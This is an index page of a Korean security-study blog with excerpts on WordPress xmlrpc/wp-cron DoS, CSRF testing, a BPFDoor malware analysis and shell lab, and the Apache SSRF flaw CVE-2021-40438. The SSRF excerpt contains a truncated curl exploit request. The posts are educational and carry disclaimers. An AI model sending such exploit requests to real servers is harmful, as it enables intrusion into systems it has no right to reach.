초보의 해킹 공부

고정 헤더 영역

글 제목

메뉴 레이어

초보의 해킹 공부

메뉴 리스트

  • 홈
  • 태그
  • 방명록
  • 분류 전체보기 (5)
    • 취약점 연구 (4)
      • CVE (1)
      • 연구 (3)
      • 안드로이드 (0)
    • Reversing (0)
    • 이론 (0)
    • CTF (0)
    • 기타 (1)

검색 레이어

초보의 해킹 공부

검색 영역

컨텐츠 검색

전체 글

  • Wordpress 공통 취약점 (xmlrpc.php, wp-cron.php)

    2025.08.06 by 8lu3sh311

  • CSRF, CSRF에 대해

    2025.08.02 by 8lu3sh311

  • BPFDoor 분석 및 실습

    2025.07.31 by 8lu3sh311

  • CVE-2021-40438 (SSRF)

    2024.02.16 by 8lu3sh311

  • 안녕하세요 8lu3sh311입니다.

    2024.01.10 by 8lu3sh311

Wordpress 공통 취약점 (xmlrpc.php, wp-cron.php)

웹 서비스 중 wordpress를 이용하여 서비스할 경우 xmlrpc.php, wp-cron.php 파일이 노출되어 있는 경우를 자주 볼 수 있다. 보통 최상위 경로의 /xmlrpc.php 및 /wp-cron.php로 접근이 가능하며, 크게 위험한 취약점이 나오는 경우는 없으나, DoS계열 공격이 가능하므로 외부에서 접근 불가능하도록 설정해야 한다. 이번 포스트에서는 Wordpress의 DoS 관련 공격 과정을 포함합니다.이번 과정은 불필요한 페이지의 위험성을 설명하고자 정리된 내용이며 공격을 장려하기 위한 글이 아님을 명시합니다.해당 글로 인해 받은 모든 불이익은 당사자에게 모든 책임이 있음을 명심하시길 바랍니다.1. xmlrpc.php rpc프로토콜의 일종으로 워드프레스에선 xml형식 HTTP전송을 ..

취약점 연구/연구 2025. 8. 6. 01:43

CSRF, CSRF에 대해

주요정보통신기반시설(2021) 가이드에는 CSRF 취약점이 다음으로 정의되어 있다. 사용자의 신뢰(인증) 정보 내에서 사용자의 요청(Request)을 변조함으로써 해당 사용자의 권한으로 악의적인 공격을 수행할 수 있음 또한, 점검 방법은 다음과 같이 명시되어 있다. Step 1) XSS 취약점이 존재하는지 확인Step 2) 등록 및 변경 등의 데이터 수정 기능의 페이지가 있는지 조사함Step 3) 데이터 수정 페이지에서 전송되는 요청(Request) 정보를 분석하여 임의의 명령을 수행하는 스크립트 삽입 후 해당 게시글을 타 사용자가 열람하였을 경우 스크립트가 실행되는지 확인 반면에, PortSwigger 공식 페이지에서 CSRF 점검 방법은 조금 다르게 설명하고 있다.https://portswigger..

취약점 연구/연구 2025. 8. 2. 18:41

BPFDoor 분석 및 실습

2025년 4월 SKT의 초대형 사고가 발생하면서, BPFDoor라는 악성코드에 대해 관심이 커지고 있다. 따라서, BPFDoor가 어떤 악성코드인지 간단히 분석해보며, 실제 공인 ip 환경에서 실습까지 진행해보려 한다. 이번 포스트에서는 BPFDoor를 실행시켜 시스템의 쉘을 획득하는 과정을 포함합니다. 이번 과정은 BPFDoor의 위험성을 이해하고자 정리된 내용이며 해킹을 장려하기 위한 글이 아님을 명시합니다. 해당 글로 인해 받은 모든 불이익은 당사자에게 모든 책임이 있음을 명심하시길 바랍니다. 1. BPF(Berkeley Packet Filter)란?BPF(Berkeley Packet Filter)는 네트워크 패킷 필터링을 위해 개발된 메커니즘이다. 커널 영역에 설치되어 외부로부터 전달받은 패킷을..

취약점 연구/연구 2025. 7. 31. 10:18

CVE-2021-40438 (SSRF)

Apache HTTP Server에서 발견된 취약점이다. 이 취약점이 가능한 환경은 다음과 같다. 1. Apache HTTP Server 2.4.48 이하 버전 사용 시2. 서버 내 mod_proxy 모듈 활성화 공격 방법은 매우 단순하다. curl "https://source.ru/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..

취약점 연구/CVE 2024. 2. 16. 21:58

안녕하세요 8lu3sh311입니다.

화이트해커를 꿈꾸는 블로그입니다. 웹해킹을 좋아하며 안드로이드 관련 연구도 좋아합니다 감사합니다RedSec: www.redsec.co.kr 드림핵 : https://dreamhack.io/users/26378/이외 포트폴리오 : https://sprout-drain-7d4.notion.site/2461470e3e1780b3a13bffb1a20f645b?pvs=73

기타 2024. 1. 10. 13:13

추가 정보

인기글

최신글

페이징

이전
1
다음
TISTORY
초보의 해킹 공부 © Magazine Lab
페이스북 트위터 인스타그램 유투브 메일

티스토리툴바